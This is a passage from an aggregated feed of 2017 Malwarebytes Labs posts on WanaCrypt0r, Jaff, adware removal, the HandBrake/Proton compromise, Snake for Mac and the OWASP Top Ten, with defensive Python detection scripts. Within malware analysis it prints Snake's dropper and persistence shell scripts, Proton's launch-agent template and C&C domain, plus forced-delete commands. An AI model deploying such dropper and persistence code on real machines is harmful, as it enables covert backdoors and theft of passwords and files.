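SAMPLE_FLOWS = (
    [("10.0.0.5", "10.0.0.%d" % i, 445) for i in range(1, 30)]
    + [("10.0.0.5", "203.0.113.%d" % i, 445) for i in range(1, 256)]
    + [("10.0.0.7", "10.0.0.9", 445), ("10.0.0.7", "10.0.0.10", 445),
       ("10.0.0.8", "192.0.2.1", 443)]
)

# RFC 1918 space stands in for "the LAN" here; substitute the site's real ranges.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_lan(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LAN_NETS)


def fanout_by_source(flows, port=445):
    """Per source: distinct LAN targets on `port`, and Internet targets grouped per /24."""
    stats = defaultdict(lambda: {"lan": set(), "per24": defaultdict(set)})
    for src, dst, dport in flows:
        if dport != port:
            continue
        if is_lan(dst):
            stats[src]["lan"].add(dst)
        else:
            net = str(ipaddress.ip_network(dst + "/24", strict=False))
            stats[src]["per24"][net].add(dst)
    return stats


def flag_scanners(flows, lan_threshold=10, sweep_threshold=200):
    """Return [(src, [reasons])] for sources whose port-445 fan-out looks like the worm.

    The worm limits itself to 10 concurrent LAN targets and sweeps a whole /24 once a
    random Internet host answers on 445; the two thresholds (assumed values) key on that.
    """
    alerts = []
    for src, s in fanout_by_source(flows).items():
        reasons = []
        if len(s["lan"]) > lan_threshold:
            reasons.append("lan_fanout=%d" % len(s["lan"]))
        sweeps = sorted(net for net, hosts in s["per24"].items() if len(hosts) >= sweep_threshold)
        if sweeps:
            reasons.append("slash24_sweep=" + ",".join(sweeps))
        if reasons:
            alerts.append((src, reasons))
    return sorted(alerts)


if __name__ == "__main__":
    for src, reasons in flag_scanners(SAMPLE_FLOWS):
        print(src, *reasons)
```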


It is critical that you install all available OS updates to prevent getting exploited via the MS17-010 vulnerability. Any systems running a Windows version that did not receive a patch for this vulnerability should be removed from all networks. If your systems have been affected, DOUBLEPULSAR will also have been installed, so it will need to be removed as well. A script is available that can remotely detect and remove the DOUBLEPULSAR backdoor. Consumer and business customers of Malwarebytes are protected from this ransomware by the premium version of Malwarebytes and Malwarebytes Endpoint Security, respectively.

The post The worm that spreads WanaCrypt0r appeared first on Malwarebytes Labs.


WanaCrypt0r ransomware hits it big just before the weekend

Malwarebytes - Fri, 05/12/2017 - 18:07

Reports of two massive, global ransomware attacks are dominating the news. As workers in Europe are heading home for the weekend, ransomware is shutting down their systems. Here’s what we know so far.

Big targets

National Health Service (NHS) England, and Telefonica, one of the largest telecom providers in the world, have each given out statements indicating that their systems have been brought to a grinding halt by a ransomware that Malwarebytes detects as Ransom.WanaCrypt0r. The ransomware has also been observed hitting companies in Spain, Russia, Ukraine, and Taiwan.


The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet.

The demanded ransom of $300 stands in stark contrast to the potential risks to the public that come with the targets being big utility and healthcare companies. We can only hope that the companies that were hit will be able to get their backups deployed quickly and can start the recovery from this cyberattack.


Consumers and businesses alike should be sure their systems and software are updated with all current patches in order to stop the spread of infection. Both our consumer product, Malwarebytes, and our business product, Malwarebytes Endpoint Security, protect against this threat, since we detect this ransomware. And our anti-ransomware technology will stop any future unknown variants.

More to come

We’ll continue to update this post as news develops. We’ll provide additional technical analysis throughout the day.

The post WanaCrypt0r ransomware hits it big just before the weekend appeared first on Malwarebytes Labs.


New ‘Jaff’ ransomware via Necurs asks for 2 BTC

Malwarebytes - Thu, 05/11/2017 - 17:11

There is yet another ransomware on the block, but contrary to the many copycats out there, this one appears to be more serious and widespread, since it is part of the Necurs spam campaigns.

Originally identified by security researcher S!Ri, the Jaff ransomware looks very similar to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens a Word document with a macro, and a similar payment page.

However, this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing.

Malwarebytes users are already protected against this ransomware thanks to our multi-layer defense. In the diagram below we show how the threat can be blocked via each of our protection modules (in a typical scenario, the threat would be stopped at the first layer which is the Application Behavior Protection):

In the meantime, the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market share from it.

The post New ‘Jaff’ ransomware via Necurs asks for 2 BTC appeared first on Malwarebytes Labs.


Adware the series, part 3

Malwarebytes - Wed, 05/10/2017 - 15:00

In this series of posts, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Getting rid of files

In this post, we will discuss several methods to remove the files responsible for showing you the offending advertisements in those cases where the identified process is not a browser.


With many PUPs and sometimes even more intrusive adware, uninstalling the program that is showing you the advertisements will be enough. If this works, it is often the cleanest and easiest method to get rid of the advertisements. Identifying which program to uninstall from your list of installed software and features is sometimes the hardest step in this process. Here are a few tips that might help you to do so:

  • Use your favorite search engine to look for the process name we found to be responsible for the advertisement window. Sometimes this will reveal the name of the software it belongs to and how it’s listed in your list of installed programs and features.
  • Sort the list of installed programs and features by date of install. Although this date can easily be spoofed, most software packages in this category don’t. Compare that date to the date when the advertisements first started appearing.
    • Warning: in cases where you used a bundler there might be several entries with the same date.
  • Use your favorite search engine to look for the entries in your list of installed programs and features that you don’t recognize or remember installing.

Once you have identified the entries you want to remove, select them by clicking on the line in the list, and click on Uninstall.

It may be necessary to reboot the system for the changes to take effect. If this solves the problem, great. If not, keep reading.
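The install-date tip above, worked into a script: an added example (not the post’s own code) that reads the Programs and Features entries from both Uninstall registry hives on Windows, or falls back to constructed sample data elsewhere, and lists everything installed in the few days before the ads started, noting how many entries share each date so the bundler case stands out. The sample entries, the three-day window and the fallback behaviour are assumptions.

```python
import sys
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample of what the Uninstall keys yield (DisplayName, InstallDate, UninstallString);
# not data from the original post. Two entries share one install date, the bundler pattern.
SAMPLE_PROGRAMS = [
    ("Mozilla Firefox", "20170301", r"C:\Program Files\Mozilla Firefox\uninstall\helper.exe"),
    ("SuperCoupon Helper", "20170503", r"C:\Users\user\AppData\Local\SuperCoupon\uninst.exe"),
    ("Search Toolbar Updater", "20170503", r"C:\Program Files (x86)\STU\uninstall.exe"),
    ("7-Zip", "20161120", r"C:\Program Files\7-Zip\Uninstall.exe"),
    ("VLC media player", "20170504", r"C:\Program Files\VideoLAN\VLC\uninstall.exe"),
    ("Old Game", None, None),  # many installers never write InstallDate at all
]

UNINSTALL_KEYS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall",  # 32-bit apps on 64-bit Windows
]


def parse_install_date(value):
    """InstallDate is normally the string 'YYYYMMDD'; None when missing or malformed (it is spoofable, too)."""
    try:
        return datetime.strptime(value, "%Y%m%d").date()
    except (TypeError, ValueError):
        return None


def read_uninstall_keys():
    """Read the entries behind Programs and Features from both hives; returns [] off Windows."""
    if sys.platform != "win32":
        return []
    import winreg
    programs = []
    for key_path in UNINSTALL_KEYS:
        try:
            root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path)
        except OSError:
            continue
        for i in range(winreg.QueryInfoKey(root)[0]):
            sub = winreg.OpenKey(root, winreg.EnumKey(root, i))
            values = {}
            for name in ("DisplayName", "InstallDate", "UninstallString"):
                try:
                    values[name] = winreg.QueryValueEx(sub, name)[0]
                except OSError:
                    values[name] = None
            if values["DisplayName"]:  # keys without a DisplayName are hidden from the list anyway
                programs.append((values["DisplayName"], values["InstallDate"], values["UninstallString"]))
    return programs


def suspects(programs, first_ads, window_days=3):
    """Entries installed within `window_days` before the ads started, newest first.

    `first_ads` is a date or a 'YYYYMMDD' string. Each hit is
    (install_date, name, uninstall_string, same_day_count); a same_day_count above 1
    is the bundler case, where one download dropped several programs on the same day.
    """
    if isinstance(first_ads, str):
        first_ads = parse_install_date(first_ads)
    start = first_ads - timedelta(days=window_days)
    dated = [(parse_install_date(d), n, u) for n, d, u in programs]
    per_day = Counter(d for d, _, _ in dated if d)
    hits = [(d, n, u, per_day[d]) for d, n, u in dated if d and start <= d <= first_ads]
    return sorted(hits, key=lambda h: (h[0], h[1]), reverse=True)


if __name__ == "__main__":
    rows = read_uninstall_keys() or SAMPLE_PROGRAMS
    for when, name, uninstall, same_day in suspects(rows, "20170504"):
        print(when, name, "(%d installed that day)" % same_day, uninstall)
```

A legitimate program can land in the window too (VLC in the sample), so the list is a shortlist to research, not a verdict.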

Delete the file

If the advertisements don’t stop after trying the user-friendly approach outlined earlier, your next step is to delete the file responsible for the advertisements. This is a much less clean solution, as it may leave clutter behind. There are several methods that can be used, and I will list them in order of stubbornness. But first, we need to find the file. Since we already used Process Explorer to identify the process, we will also use it to locate the file. Right-click the selected process, choose Properties, and look at the Image tab to see the full path to the file.

Make a note of the path as we will need that later on. Then close the properties window and right-click the selected process once more. This time use the Kill Process Tree option and confirm that you want to kill this process (and if applicable the ones under it). If the process respawns immediately or Process Explorer (running elevated) is unable to kill it, you will have to wait for other parts in this series. If the process dies you can proceed with the deletion methods below.

  • Easy: navigate to the file path you made a note of earlier, right-click the file and choose Delete.
  • If that doesn’t work, there is always FileASSASSIN, but you will have to be 100% sure about the file you are going to remove.
    • Download and install FileASSASSIN following the prompts.
    • Browse to the file you want to delete, check all the upper boxes as shown below and click Execute.
    • You will see a prompt telling you whether the deletion was successful or not.
    • If this method does not work, give the Use delete on Windows reboot function of FileASSASSIN a try.
  • The last method we will discuss here involves rebooting your computer in Safe Mode with Command Prompt. Doing so will cause Windows to only run the bare necessities and lessen the chance of the user being unable to delete the file. In the Command Prompt use this command structure:

DEL /F /S /Q /A "{full path to the file, including the extension}"

  • Sometimes deleting such a file can cause errors, which can be avoided by replacing the file with another (legitimate) one. Again you will want to boot into Safe Mode with Command Prompt and use this command structure:

COPY /V /Y "{full path to the legitimate file, including the extension}" "{folder of the file to be replaced}"

Note that the last argument is just the destination folder; there is no need to specify the filename and extension again.

If all of the above do not work for you, you may have to wait for the post that deals with rootkits. See you later. And stay safe out there.

Index

Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions

Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers

Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file

Up next, part 4
  • Scheduled tasks
  • Services



Pieter Arntz

The post Adware the series, part 3 appeared first on Malwarebytes Labs.


A week in security (May 01 – May 07)

Malwarebytes - Mon, 05/08/2017 - 18:00

Last week, we reported on that fake Google Docs app in real time as it wreaked havoc among Gmail users worldwide. We also pushed out part 2 of our series on adware. During World Password Day, we highlighted the fact that although using multiple passwords is good, this may be difficult if one cannot manage them efficiently.

As it’s spring in the Northern Hemisphere, we found it appropriate and timely to write up a spring cleaning post.

Lastly, we covered a fair amount of macOS malware, specifically OSX.Dok and Snake. Click those links to check out technical details for each.

OWASP top ten – Boring security that pays off

Below are notable news stories and security-related happenings:

  • Super Free Music Player Is The Latest Malware On Google Play. “Another day, another piece of malware lurking on Google Play, masquerading as a free and helpful app. This time it’s called ‘Super Free Music Player’ and is supposedly a ‘great song app for discovering and listening to trending music’, and contains ‘unlimited free songs from Soundcloud.'” (Source: Help Net Security)
  • Schools Among The Most Sought After Cyber Targets: ESET Report. “What makes these organizations such an inviting target is schools, both those of higher education and local school districts, hold in one place all the types of data prized by hackers, health care information, student and employee personally identifiable information (PII), research and even payment card data, according to a report by ESET researcher Lisa Myers.” (Source: SC Magazine)
  • UK Office Workers ‘Too Trusting’ Of Email Attachments. “More than half (58%) of office workers among 1000 employees surveyed at mid-to-large UK businesses admitted to often opening email attachments from unknown senders, leaving companies open to breaches from documents carrying malicious exploits hidden inside common file-types.” (Source: InfoSecurity Magazine)
  • Criminals Turning To Fraudulent Gift Cards. “Traditionally, gift cards have been a quick way to make stolen credit card numbers pay off quickly. They buy the gift cards online, in bulk, then use the gift cards at their leisure or resell them, without worrying that the credit card number has been canceled — until the charge backs started coming in from the credit card companies and merchants wised up.” (Source: CSO)
  • HideMyAss! Privilege Escalation Flaws Exposed. “A set of serious security flaws in the HideMyAss! proxy service which could place user security and privacy at risk have been publicly disclosed. Over the weekend, Security researcher Han Sahin said that multiple privilege escalation vulnerabilities exist in HideMyAss! Pro VPN for Apple’s OS X operating system, a subscription-based virtual private network (VPN) service used to mask user traffic and online activities.” (Source: ZDNet)
  • 7 Steps To Fight Ransomware. “As ransomware perpetrators continue to hone their skills, we’re seeing a shift to more specific targets. The driver of this shift is the realization that companies, especially larger ones, are much higher-value targets than an average individual and are thus able to pay significantly higher ransoms. This change has elevated the need for companies to strengthen their defensive strategies. Executives must allocate resources and ensure strategies are active against ransomware intent on paralyzing their organization.” (Source: Dark Reading)
  • Fraudsters Draining Accounts With ‘SIM Swaps’ – What To Do. “A new phone can take over your old number because the number is actually tied to your SIM card – in fact, SIM is short for subscriber identity module, a special system-on-a-chip card that securely stores the cryptographic secret that identifies your phone number to the network. You may also need to get a new SIM from your mobile provider if you switch to a phone that requires a differently sized SIM card to the one in your current device.” (Source: Sophos’s Naked Security Blog)
  • Thieves Drain 2fa-protected Bank Accounts By Abusing SS7 Routing Protocol. “The unidentified attackers exploited weaknesses in Signalling System No. 7, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.” (Source: Ars Technica)
  • iPhone Phishing Scam Crosses Over Physical Crime. “Last late April a friend of mine had his iPhone stolen in the streets—an unfortunately familiar occurrence in big, metropolitan areas in countries like Brazil. He managed to buy a new one but kept the same number for convenience. Nothing appeared to be out of the ordinary at first—until he realized the thief changed his Facebook password.” (Source: TrendLabs’s Security Intelligence Blog)
  • NYPD: Fraud Ring Recruited Mules Via Social Media. “New York City police are claiming victory after smashing a multi-million-dollar financial fraud ring which is alleged to have recruited participants via enticing social media ads. The authorities have indicted 39 people for their part in a sophisticated operation which resulted in a whopping $2.5m in fraud.” (Source: InfoSecurity Magazine)
  • Europe Pumps Out 50% More Cybercrime Attacks Than US. “Cybercrime attacks launched from Europe reached more than 50 million in the first quarter, double the volume coming out of the US, according to the ThreatMetrix Q1 Cybercrime Report released today. And within Europe, Italy, France, Germany, and the UK accounted for half of all attacks originating out of the region, with the UK and Germany contributing the lion’s share.” (Source: Dark Reading)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (May 01 – May 07) appeared first on Malwarebytes Labs.


HandBrake hacked to drop new variant of Proton malware

Malwarebytes - Mon, 05/08/2017 - 17:04

Last year, the Transmission torrent app was hacked not just once, but twice, to install the KeRanger ransomware and, later, the Keydnap backdoor. Now, the same thing has happened to the popular DVD-ripping HandBrake app, which is installing a new variant of the Proton malware.

The real HandBrake 1.0.7 app was replaced with a malicious copy on May 2. The issue was discovered and the malicious app removed on May 6, and a security warning was posted on the HandBrake website. Both the download on the HandBrake website and the copy of HandBrake available via Homebrew (a command-line software installation system) were affected.

Am I infected?

The security warning provides SHA1 and SHA256 hashes for the malicious HandBrake-1.0.7.dmg file, recommending that you check this against the hash of your download before installing. To do this, enter the following command in the Terminal app (found in the Utilities folder in the Applications folder):

shasum /path/to/HandBrake-1.0.7.dmg

(Of course, be sure to insert the proper path to the .dmg file. Note that you can drag a file onto the Terminal window to insert its path into the command automatically. shasum prints a SHA1 hash by default; run shasum -a 256 on the same file to get the SHA256 hash for comparison with the second published value.)

Compare the value returned by this command to the SHA1 hash. If it’s a match, throw that .dmg file in the trash, delete your copy of HandBrake, and scan your Mac with Malwarebytes for Mac. We detect this malware as OSX.Proton.

At this point, you can – in theory – safely download a new copy of HandBrake. I say “in theory” because we don’t know yet how the HandBrake site was hacked and what mitigations have been put in place to prevent future hacks.

If you download a new copy of HandBrake, you can check it against the checksums listed on the HandBrake site to verify that it is valid. However, there’s a big problem with this: If the website has been hacked to replace the legit copy of the software with a bad one, it’s reasonable to assume that the checksums there could be replaced with bad ones as well.

Unfortunately, HandBrake is not code signed, so there’s no real way to verify with 100% certainty that the copy you have has not been tampered with.

Malicious behavior

The malicious copy of HandBrake, when run, will immediately ask for an admin password.

This is not normal for HandBrake, which may tip off a veteran user of the software. However, for a new user, or someone installing an update who isn’t yet familiar with the behavior of that update, this may not raise any red flags.

If you are suspicious and click the Cancel button, it seems that the malware is not installed. Further, in my testing, there were no additional prompts in opening the app after the first. Still, I wouldn’t trust that copy of the app at all, even if it doesn’t appear to be dropping the payload under those conditions.

Unfortunately, checking for updates in the malicious copy does not result in any kind of a warning. When the same thing happened to the Transmission app, the Transmission Project quickly put out an update that would replace the infected app with a clean one, as well as cleaning up any traces of the infection on the system. Hopefully, the same will happen for HandBrake, but at the time of this writing that has not been done yet.

If the password is given, the malicious app will install the malware on the system in the following locations:

~/Library/LaunchAgents/fr.handbrake.activity_agent.plist
~/Library/RenderFiles/

The launch agent runs the activity_agent app at login and keeps it running in the event something terminates it.

However, it seems that this malware may be a bit buggy. On the first install, it also dropped a non-functional launch agent named fr.handbrake.activity_agent.plist-e with some of the contents missing. In another install, the launch agent contained the following non-functional plist data:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
    <key>KeepAlive</key>
    <true/>
    <key>Label</key>
    <string>P_MBN</string>
    <key>ProgramArguments</key>
    <array>
        <string>P_UPTH</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

It appears that the malware installs this .plist template, then uses the Unix sed command to search for and replace the P_MBN and P_UPTH values, but fails to do so in some cases. Thus, the malware does not always install successfully.

The fact that the malware requests an admin password yet installs all components in user space where no admin password is needed was initially puzzling, but that password request is actually not a system-generated prompt. It’s a phishing dialog displayed by the malware to obtain your password, which will be sent in clear text to api[DOT]handbrake[DOT]biz, the command & control (C&C) server for this malware.

The malware will create some or all of the following files:

~/Library/VideoFrameworks/
~/Library/VideoFrameworks/
~/Library/VideoFrameworks/
~/Library/VideoFrameworks/
~/Library/VideoFrameworks/
~/Library/VideoFrameworks/
~/Library/VideoFrameworks/

These files contain a number of bits of data to be exfiltrated from the machine, such as browser data (including stored form auto-fill data), keychains, and even 1Password vaults. Since the user’s password was phished previously, that can be used to unlock the keychains, and either it or other passwords found in the keychain may be able to unlock other encrypted files. (Pro tip: never store the master password for your password manager in the keychain and make sure it’s a unique, strong password!)

The file is a master archive containing everything in the VideoFrameworks folder. It, too, will be sent to the C&C server, handbrake[DOT]biz, a domain that was just registered on April 29 of this year, presumably in preparation for this attack.

Interestingly, the only two Mac apps ever to be hacked in this manner—Transmission, and now HandBrake—were both originally developed by Eric Petit. Though I don’t know if it means anything at all, it’s certainly a fair question to wonder who has access to both of these projects that could be abused in this manner.

What is Proton?

Many people may never have heard of Proton before. Earlier this year, a signature for Proton was silently added to Apple’s XProtect signatures, but nobody ever saw a copy. Later, Sixgill wrote up findings that revealed Proton was malware up for sale on the dark web.

Proton is a professionally-developed backdoor, which at the time was selling for around 40 BTC (bitcoins), an amount that is currently worth more than $63,000. At that price, unlimited installations were allowed. A single-use license cost around 2 BTC, or more than $3,000.

As an aside, I find it rather ironic that this variant of Proton appears to be a bit buggy, with some installs failing. Hopefully, Proton, Inc’s customers will have similar questions. A little discord among criminals wouldn’t be a bad thing.


This is a general-purpose backdoor with all the usual backdoor functionality. In addition, it appears this malware is exfiltrating the entire keychain, with all passwords. Thus, if you’re infected, the first priority should be changing all your online passwords. (After ensuring that your computer is free of infection, of course! Never change passwords on a device that may still be infected.)

You’ll also want to take any necessary precautions if you have sensitive data that may have been exfiltrated and business users should contact their IT departments if a company Mac is found to be infected.

Seems like this is increasingly becoming something Mac users have to worry about.


Thanks to Amit Serper for analysis that provided some clarifying details about the behavior.

The post HandBrake hacked to drop new variant of Proton malware appeared first on Malwarebytes Labs.


Snake malware ported from Windows to Mac

Malwarebytes - Fri, 05/05/2017 - 14:00

Snake, also known as Turla and Uroburos, is backdoor malware that has been infecting Windows systems since at least 2008. It is thought to be Russian government malware, and the Windows version is highly sophisticated. It was even seen infecting Linux systems in 2014. Now, it appears to have been ported to the Mac.

Fox-IT International wrote about the discovery of a Mac version of Snake on Tuesday. It’s not known at this point how Snake is spread, although the fact that it imitates an Adobe Flash Player installer suggests a not-very-sophisticated method. (I mean, come on, there are other pieces of software out there! Why are the bad guys so hung up on Flash installers?)

Distribution method

The malware was found in a file named Install Adobe Flash The app inside the .zip file would appear to be a legit Adobe Flash Player installer. The app is signed, however, by a certificate issued to an “Addy Symonds” rather than Adobe, but the average user is never going to know that… as long as it’s signed, Apple’s Gatekeeper system will allow it, when set to its default settings.

If the app is opened, it will immediately ask for an admin user password, which is typical behavior for a real Flash installer. If such a password is provided, the behavior continues to be consistent with the real thing.

Proceeding through the installation to the end will display no suspicious behavior and in the end, Flash will actually be installed. This is a significant break from other fake Flash installers, which at best download the real Flash installer and open it separately after proceeding through a completely unconvincing fake install process.

It turns out that this is because the app incorporates a real Flash installer. The app has a rather strange internal structure, lacking the normal structure of an application bundle on macOS. It works, though.

When the app runs, a malicious executable named Install – also code-signed by Addy Symonds – runs first. That process, in turn, executes an included shell script named

#!/bin/sh
SCRIPT_DIR=$(dirname "$0")
TARGET_PATH=/Library/Scripts
TARGET_PATH2=/Library/LaunchDaemons
cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue"
cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp"
cp -f "${SCRIPT_DIR}/" "${TARGET_PATH}/"
cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist"
"${TARGET_PATH}/"
"${SCRIPT_DIR}/Install Adobe Flash Player"
exit $RC

This script installs the following components of the malware:

/Library/Scripts/queue
/Library/Scripts/installdp
/Library/Scripts/
/Library/LaunchDaemons/com.adobe.update.plist

Next, the script opens the shell script then launches the real Install Adobe Flash Player process, which performs the actual installation of Flash. By the time the Flash installer interface appears, the machine is already infected.

The script, which is also run by the installed launch daemon, simply checks to see if the malicious installdp process is running and if it isn’t, launches it.

#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
FILE="${SCRIPT_DIR}/queue#1"
# Look for a running installdp process
PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`
if [ -z "$PIDS" ]; then
    # Not running: start the backdoor with the queue file as its configuration
    ${SCRIPT_DIR}/installdp ${FILE} n
fi
exit $RC

At this point, once installdp is running, the malware is fully functional, providing a backdoor into the Mac, configured according to the data found in the queue file.
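The persistence described above (a launch daemon with an Adobe-style label that runs a shell script out of /Library/Scripts) is easy to check for. The following audit script is an added example written for this post, not Fox-IT's or Malwarebytes' code; the two plists in it are constructed, and the script name launcher.sh is a placeholder, since the post does not give the real one.

```python
"""Audit launchd daemon plists for the persistence pattern seen in this dropper.

Added example, not code from the post. It flags a LaunchDaemon that runs
something out of /Library/Scripts, that runs a shell script through an
interpreter, or that carries an Adobe-style label while its program lives
outside the usual vendor locations.
"""
import plistlib
from pathlib import Path
from typing import Dict, List, Optional

SHELL_INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/zsh")
# Where a legitimate vendor daemon normally keeps the program it launches.
VENDOR_PREFIXES = ("/Applications/", "/Library/Application Support/",
                   "/Library/PrivilegedHelperTools/", "/usr/", "/System/")
# Reverse-DNS label prefixes this dropper borrowed (com.adobe.update).
IMPERSONATED_LABELS = ("com.adobe.",)

# Constructed to mirror the dropper's com.adobe.update.plist; launcher.sh is a placeholder name.
SNAKE_STYLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.adobe.update</string>
  <key>ProgramArguments</key>
  <array><string>/bin/sh</string><string>/Library/Scripts/launcher.sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>"""

# Constructed benign daemon: a helper binary in the expected location.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>Program</key><string>/Library/PrivilegedHelperTools/com.example.helper</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""


def launched_target(job: Dict) -> Optional[str]:
    """Return the path that actually runs: the script itself when an interpreter wraps it."""
    args: List[str] = list(job.get("ProgramArguments") or [])
    program = job.get("Program") or (args[0] if args else None)
    if program in SHELL_INTERPRETERS and len(args) > 1:
        return args[1]  # "/bin/sh /Library/Scripts/x.sh": the script is the payload
    return program


def assess_daemon(plist_bytes: bytes) -> List[str]:
    """Return the reasons a daemon looks suspicious; an empty list means none found."""
    job = plistlib.loads(plist_bytes)
    target = launched_target(job)
    if target is None:
        return ["no Program or ProgramArguments"]
    reasons = []
    if target.startswith("/Library/Scripts/"):
        reasons.append("runs from /Library/Scripts")
    args = job.get("ProgramArguments") or []
    if (args and args[0] in SHELL_INTERPRETERS) or target.endswith((".sh", ".command")):
        reasons.append("launches a shell script")
    label = job.get("Label", "")
    if label.startswith(IMPERSONATED_LABELS) and not target.startswith(VENDOR_PREFIXES):
        reasons.append("vendor-style label %s but program outside vendor paths" % label)
    return reasons


def audit_directory(directory: str = "/Library/LaunchDaemons") -> Dict[str, List[str]]:
    """Assess every plist in a directory; keys are file names, values the reasons found."""
    findings = {}
    for plist in Path(directory).glob("*.plist"):
        try:
            reasons = assess_daemon(plist.read_bytes())
        except Exception as exc:  # malformed plist: report it rather than stop the sweep
            reasons = ["could not parse: %s" % exc]
        if reasons:
            findings[plist.name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit_directory().items():
        print(name, "->", "; ".join(reasons))
```

Run it on a Mac as an administrator to sweep /Library/LaunchDaemons; the same function works on /Library/LaunchAgents.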


In all, this is one of the sneakier bits of Mac malware lately. Although it’s still “just a Trojan,” it’s a quite convincing one if distributed properly. Although Mac users tend to scoff at Trojans, believing them to be easy to avoid, this is not always the case.

Trojans can be effective even when they’re junk and the social engineering behind them is poor. Consider how bad it would be if someone were to receive this file in a convincing spoofed e-mail, supposedly from their IT department or a close friend, telling them to install it immediately due to a recent Flash vulnerability! As a spear phishing attack, this could be used with devastating effect.

Further, the installed components of the malware are quite effective as well. Few people even know that the /Library/Scripts/ folder exists, so that’s a moderately safe place to dump a payload (although there are better options). The launch daemon is quite unremarkable since anyone with Adobe software will have other Adobe launch agents or daemons installed. The average person won’t know this one isn’t legitimate.

Fortunately, Apple revoked the certificate very quickly, so this particular installer is no further danger unless the user is tricked into downloading it via a method that doesn’t mark it with a quarantine flag (such as via most torrent apps). Malwarebytes for Mac will detect it as OSX.Snake and removal, in this case, is a breeze.

If you’re infected, however, as with any backdoor, it’s important to keep in mind that data may have been stolen, including passwords and any unencrypted files on the hard drive. Keep in mind that, even if you use File Vault, the files are decrypted as long as you’re logged in, so this doesn’t really count.

After removing the malware (and restarting the computer), change your passwords and make sure that you’ve taken any other necessary steps to mitigate damage due to the possibility of exfiltrated data. And, as always, if this is a business machine, contact IT so they know about the issue and can take any necessary measures to mitigate risk to the company.

The post Snake malware ported from Windows to Mac appeared first on Malwarebytes Labs.

Categories: Techie Feeds

OWASP Top Ten – Boring security that pays off

Malwarebytes - Thu, 05/04/2017 - 16:00

There’s a lot of very unique, creative, and devastating cyber threats out there. The first inclination of a defender is to collect news of the new and terrifying and concentrate on network security defenses accordingly. This is completely understandable and mostly wrong. The majority of actual attacks, rather than proofs of concept, use simple and common vulnerabilities that in some cases are decades old. As an example, Facebook and Google recently fell victim to business email compromise. We’ve discussed on the blog previously that this is not much more complicated than standing on a street corner and politely (or impolitely, depending on the company you’re spoofing) asking for money.

OWASP is a group of security professionals who aggregate and publish this second type of vulnerabilities – boring, but very common and very commonly exploited. They recently published a draft list of the top 10 security vulnerabilities of 2017. While intended for developers seeking to code more secure applications, the top 10 list is based on actual survey data of threats seen in the wild and serves as a great starting point for organizations struggling with security priorities. Let’s take a look and see how long they’ve been around prior to publication.

OWASP Beta 2017 Top 10

Injection

Injection flaws, such as SQL, OS, XXE, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. SQL injection was first seen possibly as early as 1998. Detailed info on mitigations can be found here.

Broken authentication and session management

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (temporarily or permanently). The earliest online reference I could find to a Man in the Middle attack was 2001, but given that cookies were first introduced in 1994, the attack almost certainly has a longer history in the wild.

Cross-site scripting

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. XSS was first discussed by Microsoft engineers in 2001. Mitigations generally include adhering to coding best practices and a robust testing program prior to release.

Broken access control

Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc. This is a vulnerability that predates computers, and will still be seen after the singularity. The easiest patch is to use a robust threat model to determine the least necessary privileges for each user.

Security misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. Again, misconfiguration of security measures predates their application to computers. An auditing and red team program with teeth can assist in programs being appropriately configured before they hit a production network.

Sensitive data exposure

